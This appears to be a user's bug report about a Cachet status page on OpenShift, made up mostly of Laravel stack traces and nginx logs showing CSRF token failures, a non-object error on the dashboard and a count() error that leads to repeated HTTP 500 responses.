#64 Illuminate\Foundation\Bootstrap\HandleExceptions:handleError in /var/www/html/storage/framework/views/01d9882a55d2483ff43d71a5718dcd19bcc868f8.php:46
#63 include in /var/www/html/vendor/laravel/framework/src/Illuminate/View/Engines/PhpEngine.php:43
#62 Illuminate\View\Engines\PhpEngine:evaluatePath in /var/www/html/vendor/laravel/framework/src/Illuminate/View/Engines/CompilerEngine.php:59
#61 Illuminate\View\Engines\CompilerEngine:get in /var/www/html/vendor/laravel/framework/src/Illuminate/View/View.php:142
#60 Illuminate\View\View:getContents in /var/www/html/vendor/laravel/framework/src/Illuminate/View/View.php:125
#59 Illuminate\View\View:renderContents in /var/www/html/vendor/laravel/framework/src/Illuminate/View/View.php:90
#58 Illuminate\View\View:render in /var/www/html/vendor/laravel/framework/src/Illuminate/Http/Response.php:42
#57 Illuminate\Http\Response:setContent in /var/www/html/vendor/symfony/http-foundation/Response.php:202
#56 Symfony\Component\HttpFoundation\Response:__construct in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:750
#55 Illuminate\Routing\Router:toResponse in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:722
#54 Illuminate\Routing\Router:prepareResponse in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:682
#53 Illuminate\Routing\Router:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:30
#52 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Middleware/ValidateSignature.php:22
#51 Illuminate\Routing\Middleware\ValidateSignature:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#50 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#49 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/app/Http/Middleware/SubscribersConfigured.php:55
#48 CachetHQ\Cachet\Http\Middleware\SubscribersConfigured:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#47 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#46 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/app/Http/Middleware/Localize.php:68
#45 CachetHQ\Cachet\Http\Middleware\Localize:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#44 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#43 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/app/Http/Middleware/ReadyForUse.php:60
#42 CachetHQ\Cachet\Http\Middleware\ReadyForUse:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#41 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#40 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Middleware/SubstituteBindings.php:41
#39 Illuminate\Routing\Middleware\SubstituteBindings:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#38 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#37 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:75
#36 Illuminate\Foundation\Http\Middleware\VerifyCsrfToken:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#35 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#34 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php:49
#33 Illuminate\View\Middleware\ShareErrorsFromSession:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#32 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#31 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:63
#30 Illuminate\Session\Middleware\StartSession:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#29 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#28 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php:37
#27 Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#26 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#25 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php:66
#24 Illuminate\Cookie\Middleware\EncryptCookies:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#23 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#22 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:104
#21 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:684
#20 Illuminate\Routing\Router:runRouteWithinStack in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:659
#19 Illuminate\Routing\Router:runRoute in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:625
#18 Illuminate\Routing\Router:dispatchToRoute in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:614
#17 Illuminate\Routing\Router:dispatch in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:176
#16 Illuminate\Foundation\Http\Kernel:Illuminate\Foundation\Http\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:30
#15 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/barryvdh/laravel-debugbar/src/Middleware/InjectDebugbar.php:65
#14 Barryvdh\Debugbar\Middleware\InjectDebugbar:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#13 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#12 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/CheckForMaintenanceMode.php:62
#11 Illuminate\Foundation\Http\Middleware\CheckForMaintenanceMode:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#10 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#9 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/fideloper/proxy/src/TrustProxies.php:57
#8 Fideloper\Proxy\TrustProxies:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#7 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#6 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/barryvdh/laravel-cors/src/HandlePreflight.php:29
#5 Barryvdh\Cors\HandlePreflight:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#4 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#3 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:104
#2 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:151
#1 Illuminate\Foundation\Http\Kernel:sendRequestThroughRouter in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:116
#0 Illuminate\Foundation\Http\Kernel:handle in /var/www/html/public/index.php:54

Error 2 : when trying to update a subscription, changes are not taken into account and there is an insecure connection alert from firefox (request is sent through http and not https), no errors logged and the subscribtions table in database is empty

2020/08/06 14:17:16 [error] 70#70: *91 FastCGI sent in stderr: "PHP message: [2020-08-06 14:17:16] production.ERROR: ErrorException: Trying to get property of non-object in /var/www/html/app/Http/Controllers/Dashboard/DashboardController.php:88
Stack trace:
#0 /var/www/html/app/Http/Controllers/Dashboard/DashboardController.php(88): Illuminate\Foundation\Bootstrap\HandleExceptions->handleError(8, 'Trying to get p...', '/var/www/html/a...', 88, Array)
#1 [internal function]: CachetHQ\Cachet\Http\Controllers\Dashboard\DashboardController->showDashboard()
#2 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Controller.php(80): call_user_func_array(Array, Array)
#3 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php(146): Illuminate\Routing\Controller->callAction('showDashboard', Array)
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php(94): Illuminate\Routing\ControllerDispatcher->call(Object(CachetHQ\Cachet\Http\Controllers\Dashboard\DashboardController), Object(Illuminate\Routing\Rout" while reading response header from upstream, client: X.X.X.X, server: localhost, request: "GET /dashboard HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "ww.example.com"
X.X.X.X - - [06/Aug/2020:14:17:16 +0000] "GET /dashboard HTTP/1.1" 500 3195 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" "Y.Y.Y.Y"
X.X.X.X - - [06/Aug/2020:14:37:04 +0000] "GET /setup HTTP/1.1" 200 8051 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" "Y.Y.Y.Y"
2020/08/06 14:37:26 [error] 121#121: *11 FastCGI sent in stderr: "PHP message: [2020-08-06 14:37:26] production.NOTICE: Illuminate\Session\TokenMismatchException in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:67
Stack trace:
#0 [internal function]: Illuminate\Foundation\Http\Middleware\VerifyCsrfToken->handle(Object(Illuminate\Http\Request), Object(Closure))
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(136): call_user_func_array(Array, Array)
#2 [internal function]: Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(Object(Illuminate\Http\Request))
#3 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php(32): call_user_func(Object(Closure), Object(Illuminate\Http\Request))
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php(49): Illuminate\Routing\Pipeline->Illuminate\Routing\{closure}(Object(Illuminate\Http\Request))
#5 [internal function]: Illuminate\View\Middleware\ShareErrorsFromSession->handle(Objec" while reading response header from upstream, client: X.X.X.X, server: localhost, request: "POST /setup/step1 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "www.example.com", referrer: "https://www.example.com/setup "
X.X.X.X - - [06/Aug/2020:14:37:26 +0000] "POST /setup/step1 HTTP/1.1" 400 145 "https://cachet.apps.wok.in2p3.fr/setup " "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" "Y.Y.Y.Y"
2020/08/06 14:52:41 [error] 123#123: *126 FastCGI sent in stderr: "PHP message: [2020-08-06 14:52:41] production.WARNING: Symfony\Component\HttpKernel\Exception\HttpException in /var/www/html/app/Http/Middleware/Authenticate.php:51
Stack trace:
#0 [internal function]: CachetHQ\Cachet\Http\Middleware\Authenticate->handle(Object(Illuminate\Http\Request), Object(Closure))
#1 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(136): call_user_func_array(Array, Array)
#2 [internal function]: Illuminate\Pipeline\Pipeline->Illuminate\Pipeline\{closure}(Object(Illuminate\Http\Request))
#3 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php(32): call_user_func(Object(Closure), Object(Illuminate\Http\Request))
#4 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php(64): Illuminate\Routing\Pipeline->Illuminate\Routing\{closure}(Object(Illuminate\Http\Request))
#5 [internal function]: Illuminate\Foundation\Http\Middleware\VerifyCsrfToken->handle(Object(Illuminate\Http\Request), Object(Clos" while reading response header from upstream, client: 172.19.16.1, server: localhost, request: "GET /dashboard HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "www.example.com", referrer: "https://www.example.com/ "

The status page is working, if we try to subscribe, the error happens too.

Symfony\Component\HttpKernel\Exception\BadRequestHttpException thrown with message "CSRF token validation failed."

Stacktrace:
#42 Symfony\Component\HttpKernel\Exception\BadRequestHttpException in /var/www/html/vendor/graham-campbell/exceptions/src/Transformers/CsrfTransformer.php:37
#41 GrahamCampbell\Exceptions\Transformers\CsrfTransformer:transform in /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionHandler.php:253
#40 GrahamCampbell\Exceptions\ExceptionHandler:getTransformed in /var/www/html/vendor/graham-campbell/exceptions/src/ExceptionHandler.php:181
#39 GrahamCampbell\Exceptions\ExceptionHandler:render in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:83
#38 Illuminate\Routing\Pipeline:handleException in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:55
#37 Illuminate\Session\TokenMismatchException in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:82
#36 Illuminate\Foundation\Http\Middleware\VerifyCsrfToken:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#35 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#34 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php:49
#33 Illuminate\View\Middleware\ShareErrorsFromSession:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#32 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#31 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:63
#30 Illuminate\Session\Middleware\StartSession:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#29 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#28 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php:37
#27 Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#26 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#25 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php:66
#24 Illuminate\Cookie\Middleware\EncryptCookies:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#23 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#22 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:104
#21 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:684
#20 Illuminate\Routing\Router:runRouteWithinStack in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:659
#19 Illuminate\Routing\Router:runRoute in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:625
#18 Illuminate\Routing\Router:dispatchToRoute in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:614
#17 Illuminate\Routing\Router:dispatch in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:176
#16 Illuminate\Foundation\Http\Kernel:Illuminate\Foundation\Http\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:30
#15 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/barryvdh/laravel-debugbar/src/Middleware/InjectDebugbar.php:65
#14 Barryvdh\Debugbar\Middleware\InjectDebugbar:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#13 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#12 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/CheckForMaintenanceMode.php:62
#11 Illuminate\Foundation\Http\Middleware\CheckForMaintenanceMode:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#10 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#9 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/fideloper/proxy/src/TrustProxies.php:57
#8 Fideloper\Proxy\TrustProxies:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#7 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#6 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/barryvdh/laravel-cors/src/HandlePreflight.php:29
#5 Barryvdh\Cors\HandlePreflight:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:163
#4 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:53
#3 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:104
#2 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:151
#1 Illuminate\Foundation\Http\Kernel:sendRequestThroughRouter in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:116
#0 Illuminate\Foundation\Http\Kernel:handle in /var/www/html/public/index.php:54

And then there is only error 500, even on status page, hence Openshift tries to kill and restart the pod indefinetly.

ErrorException thrown with message "count(): Parameter must be an array or an object that implements Countable"

Stacktrace:
#72 ErrorException in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1161
#71 count in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1161
#70 Illuminate\Database\Eloquent\Builder:callScope in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:1192
#69 Illuminate\Database\Eloquent\Builder:applyScopes in /var/www/html/vendor/laravel/framework/src/Illuminate/Database/Eloquent/Builder.php:314
#68 Illuminate\Database\Eloquent\Builder:get in /var/www/html/app/Http/Controllers/Dashboard/DashboardController.php:79
#67 CachetHQ\Cachet\Http\Controllers\Dashboard\DashboardController:showDashboard in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Controller.php:80
#66 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Controller.php:80
#65 Illuminate\Routing\Controller:callAction in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php:146
#64 Illuminate\Routing\ControllerDispatcher:call in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php:94
#63 Illuminate\Routing\ControllerDispatcher:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:52
#62 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:52
#61 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:102
#60 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:102
#59 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php:96
#58 Illuminate\Routing\ControllerDispatcher:callWithinStack in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php:54
#57 Illuminate\Routing\ControllerDispatcher:dispatch in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Route.php:174
#56 Illuminate\Routing\Route:runController in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Route.php:140
#55 Illuminate\Routing\Route:run in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:724
#54 Illuminate\Routing\Router:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:52
#53 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:52
#52 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/app/Http/Middleware/Authenticate.php:54
#51 CachetHQ\Cachet\Http\Middleware\Authenticate:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#50 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#49 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#48 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#47 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php:64
#46 Illuminate\Foundation\Http\Middleware\VerifyCsrfToken:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#45 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#44 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#43 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#42 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php:49
#41 Illuminate\View\Middleware\ShareErrorsFromSession:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#40 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#39 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#38 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#37 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php:62
#36 Illuminate\Session\Middleware\StartSession:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#35 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#34 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#33 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#32 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php:37
#31 Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#30 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#29 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#28 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#27 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php:59
#26 Illuminate\Cookie\Middleware\EncryptCookies:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#25 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#24 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#23 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#22 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:102
#21 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:102
#20 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:726
#19 Illuminate\Routing\Router:runRouteWithinStack in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:699
#18 Illuminate\Routing\Router:dispatchToRoute in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php:675
#17 Illuminate\Routing\Router:dispatch in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:246
#16 Illuminate\Foundation\Http\Kernel:Illuminate\Foundation\Http\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:52
#15 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:52
#14 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/CheckForMaintenanceMode.php:44
#13 Illuminate\Foundation\Http\Middleware\CheckForMaintenanceMode:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#12 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#11 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#10 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#9 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/fideloper/proxy/src/TrustProxies.php:56
#8 Fideloper\Proxy\TrustProxies:handle in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#7 call_user_func_array in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:136
#6 Illuminate\Pipeline\Pipeline:Illuminate\Pipeline\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#5 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Pipeline.php:32
#4 Illuminate\Routing\Pipeline:Illuminate\Routing\{closure} in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:102
#3 call_user_func in /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php:102
#2 Illuminate\Pipeline\Pipeline:then in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:132
#1 Illuminate\Foundation\Http\Kernel:sendRequestThroughRouter in /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:99
#0 Illuminate\Foundation\Http\Kernel:handle in /var/www/html/public/index.php:54
View more
1 comment
MatheoAtche

MatheoAtche

